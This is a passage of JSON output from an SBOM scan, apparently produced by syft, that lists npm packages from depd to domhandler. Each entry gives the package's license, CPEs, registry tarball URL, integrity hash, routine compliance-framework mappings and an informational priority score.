"purl": "pkg:npm/depd@2.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a7d6bc7c01ff6fdb", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: destroy 1.2.0", "title": "destroy 1.2.0", "description": "Package discovered: destroy 1.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "916ee50fe6c61deb", "name": "destroy", "version": "1.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:destroy:destroy:1.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/destroy@1.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/destroy/-/destroy-1.2.0.tgz", "integrity": "sha512-2sJGJTaXIIaR1w4iJSNoN0hnMY7Gpc/n8D4qSCJw8QqFWXf7cuAgnEHxBpweaVcPevC2l3KpjYCx3NypQQgaJg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b1baa34830820f96", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: detect-libc 2.1.2", "title": "detect-libc 2.1.2", "description": "Package discovered: detect-libc 2.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "cd3c75639d40cfa6", "name": "detect-libc", "version": "2.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:detect-libc:detect-libc:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:detect-libc:detect_libc:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:detect_libc:detect-libc:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:detect_libc:detect_libc:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:detect:detect-libc:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:detect:detect_libc:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/detect-libc@2.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/detect-libc/-/detect-libc-2.1.2.tgz", "integrity": "sha512-Btj2BOOO83o3WyH59e8MgXsxEQVcarkUOpEYrubB0urwnN10yQ364rsiByU11nZlqWYZm05i/of7io4mzihBtQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d9872bdf37f54c1c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: dfa 1.2.0", "title": "dfa 1.2.0", "description": "Package discovered: dfa 1.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "32140b01170f2db8", "name": "dfa", "version": "1.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:dfa:dfa:1.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/dfa@1.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/dfa/-/dfa-1.2.0.tgz", "integrity": "sha512-ED3jP8saaweFTjeGX8HQPjeC1YYyZs98jGNZx6IiBvxW7JG5v492kamAQB3m2wop07CvU/RQmzcKr6bgcC5D/Q==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9f98c7e106363761", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: didyoumean 1.2.2", "title": "didyoumean 1.2.2", "description": "Package discovered: didyoumean 1.2.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "88295af7ba0997fd", "name": "didyoumean", "version": "1.2.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:didyoumean:didyoumean:1.2.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/didyoumean@1.2.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/didyoumean/-/didyoumean-1.2.2.tgz", "integrity": "sha512-gxtyfqMg7GKyhQmb056K7M3xszy/myH8w+B4RT+QXBQsvAOdc3XymqDDPHx1BgPgsdAA5SIifona89YtRATDzw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "1b1c014679b0d671", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: dijkstrajs 1.0.3", "title": "dijkstrajs 1.0.3", "description": "Package discovered: dijkstrajs 1.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7a3b023286e84986", "name": "dijkstrajs", "version": "1.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:dijkstrajs:dijkstrajs:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/dijkstrajs@1.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/dijkstrajs/-/dijkstrajs-1.0.3.tgz", "integrity": "sha512-qiSlmBq9+BCdCA/L46dw8Uy93mloxsPSbwnm5yrKn2vMPiy8KyAskTF6zuV/j5BMsmOGZDPs7KjU+mjb670kfA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4fdc8b3106066f47", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: dlv 1.1.3", "title": "dlv 1.1.3", "description": "Package discovered: dlv 1.1.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "6145214b9f2f7148", "name": "dlv", "version": "1.1.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:dlv:dlv:1.1.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/dlv@1.1.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/dlv/-/dlv-1.1.3.tgz", "integrity": "sha512-+HlytyjlPKnIG8XuRG8WvmBP8xs8P71y+SKKS6ZXWoEgLuePxtDoUEiH7WkdePWrQ5JBpE6aoVqfZfJUQkjXwA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4d01289dd001e612", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: dom-helpers 5.2.1", "title": "dom-helpers 5.2.1", "description": "Package discovered: dom-helpers 5.2.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "22b93db9f5eba040", "name": "dom-helpers", "version": "5.2.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:dom-helpers:dom-helpers:5.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:dom-helpers:dom_helpers:5.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:dom_helpers:dom-helpers:5.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:dom_helpers:dom_helpers:5.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:dom:dom-helpers:5.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:dom:dom_helpers:5.2.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/dom-helpers@5.2.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/dom-helpers/-/dom-helpers-5.2.1.tgz", "integrity": "sha512-nRCa7CK3VTrM2NmGkIy4cbK7IZlgBE/PYMn55rrXefr5xXDP0LdtfPnblFDoVdcAfslJ7or6iqAUnx0CCGIWQA==", "dependencies": { "@babel/runtime": "^7.8.7", "csstype": "^3.0.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "594471832719edc2", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: dom-serializer 2.0.0", "title": "dom-serializer 2.0.0", "description": "Package discovered: dom-serializer 2.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f8e1d8922cf56c54", "name": "dom-serializer", "version": "2.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:dom-serializer:dom-serializer:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:dom-serializer:dom_serializer:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:dom_serializer:dom-serializer:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:dom_serializer:dom_serializer:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:dom:dom-serializer:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:dom:dom_serializer:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/dom-serializer@2.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/dom-serializer/-/dom-serializer-2.0.0.tgz", "integrity": "sha512-wIkAryiqt/nV5EQKqQpo3SToSOV9J0DnbJqwK7Wv/Trc92zIAYZ4FlMu+JPFW1DfGFt81ZTCGgDEabffXeLyJg==", "dependencies": { "domelementtype": "^2.3.0", "domhandler": "^5.0.2", "entities": "^4.2.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "04fd13748534548d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: domelementtype 2.3.0", "title": "domelementtype 2.3.0", "description": "Package discovered: domelementtype 2.3.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "5df6e95fb09fce0c", "name": "domelementtype", "version": "2.3.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-2-Clause", "spdxExpression": "BSD-2-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:domelementtype:domelementtype:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/domelementtype@2.3.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/domelementtype/-/domelementtype-2.3.0.tgz", "integrity": "sha512-OLETBj6w0OsagBwdXnPdN0cnMfF9opN69co+7ZrbfPGrdpPVNBUj02spi6B1N7wChLQiPn4CSH/zJvXw56gmHw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "21e3025ed99f3f28", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: domhandler 5.0.3", "title": "domhandler 5.0.3", "description": "Package discovered: domhandler 5.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "952037d890bc80f6", "name": "domhandler", "version": "5.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-2-Clause", 